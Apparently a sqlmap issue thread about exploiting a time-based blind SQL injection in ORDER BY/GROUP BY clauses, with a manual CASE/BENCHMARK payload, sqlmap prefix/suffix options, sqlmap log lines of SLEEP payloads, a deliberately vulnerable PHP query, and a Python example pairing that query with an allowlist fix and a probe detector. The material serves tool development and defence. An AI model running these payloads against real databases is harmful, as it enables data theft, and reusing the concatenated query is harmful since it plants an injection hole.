I'm having trouble exploiting an SQLi in an ORDER BY clause with sqlmap. Manually I can inject using a construct like "(CASE WHEN 'a'='b' THEN t.bar ELSE (SELECT BENCHMARK(1000000,MD5(1))) END)" where t.bar is a correct column name and then altering the boolean clause. Unfortunately the target server responds pretty slowly, so a manual extraction is gonna be agonizingly slow.
Just passing the target URL to sqlmap (yesterday's build 4938), sqlmap won't find an injection using level 3. I also tried passing my manual vector as prefix/suffix (--prefix="(CASE WHEN 'a'='" --suffix="' THEN t.bar ELSE (SELECT BENCHMARK(1000000,MD5(1))) END)") but without avail.
The following payload works against MySQL >= 5.0 against an ORDER BY SQL injection:
[09:47:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:47:29] [PAYLOAD] 1) AND SLEEP(1)
[09:47:29] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[09:47:29] [PAYLOAD] 1' AND SLEEP(1)
[09:47:29] [PAYLOAD] 1) AND SLEEP(1) AND (1336=1336
[09:47:29] [PAYLOAD] 1)) AND SLEEP(1) AND ((4576=4576
[09:47:29] [PAYLOAD] 1))) AND SLEEP(1) AND (((5848=5848
[09:47:29] [PAYLOAD] 1 AND SLEEP(1)
[09:47:34] [PAYLOAD] 1 AND SLEEP(1)
[09:47:39] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
The vulnerable test page runs this statement:
$query = "SELECT * FROM users GROUP BY " . $_GET['id'];
However, the above is not meant to be a proper time-based blind payload for GROUP BY. It's MySQL being flexible in its syntax to allow it. I am looking into a proper fix.
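The test page's GROUP BY statement beside a hardened counterpart, as an added example that is neither sqlmap's code nor the page's own (written in Python rather than the test page's PHP); the column allowlist and the sample payloads are constructed here from the issue text. Column names cannot be bound as query parameters, so the hardened builder maps the request value onto a fixed set of known columns and rejects anything else, and a small log check flags the SLEEP/BENCHMARK probes shown above.

```python
import re

# Allowlist of columns the application may group or sort on.
# Constructed for this example; the real schema is not on the page.
ALLOWED_COLUMNS = {"id", "name", "created_at"}

# Matches the time-based probe shapes seen in the sqlmap output above.
TIME_PROBE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)


def vulnerable_query(user_value: str) -> str:
    """Mirrors the test page: the request value is concatenated verbatim."""
    return "SELECT * FROM users GROUP BY " + user_value


def safe_query(user_value: str, allowed=ALLOWED_COLUMNS) -> str:
    """Builds GROUP BY only from an allowlisted identifier.

    A bind parameter would turn the value into a string literal, not a
    column reference, so validation against a fixed set is the fix here.
    """
    if user_value not in allowed:
        raise ValueError(f"unexpected GROUP BY column: {user_value!r}")
    return "SELECT * FROM users GROUP BY `" + user_value + "`"


def reaches_sql(user_value: str) -> bool:
    """True when the hardened builder would embed the value in SQL."""
    try:
        safe_query(user_value)
    except ValueError:
        return False
    return True


def looks_like_time_based_probe(user_value: str) -> bool:
    """Detection helper for request logs: flags SLEEP()/BENCHMARK() calls."""
    return TIME_PROBE.search(user_value) is not None


# Sample request values, constructed from the payloads quoted in this issue.
SAMPLE_PAYLOADS = [
    "1) AND SLEEP(1)",
    "1 AND SLEEP(1)",
    "(CASE WHEN 'a'='b' THEN t.bar ELSE (SELECT BENCHMARK(1000000,MD5(1))) END)",
]

if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        print("vulnerable:", vulnerable_query(p))
        print("hardened  :", "rejected" if not reaches_sql(p) else safe_query(p))
        print("probe?    :", looks_like_time_based_probe(p))
```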
From a user: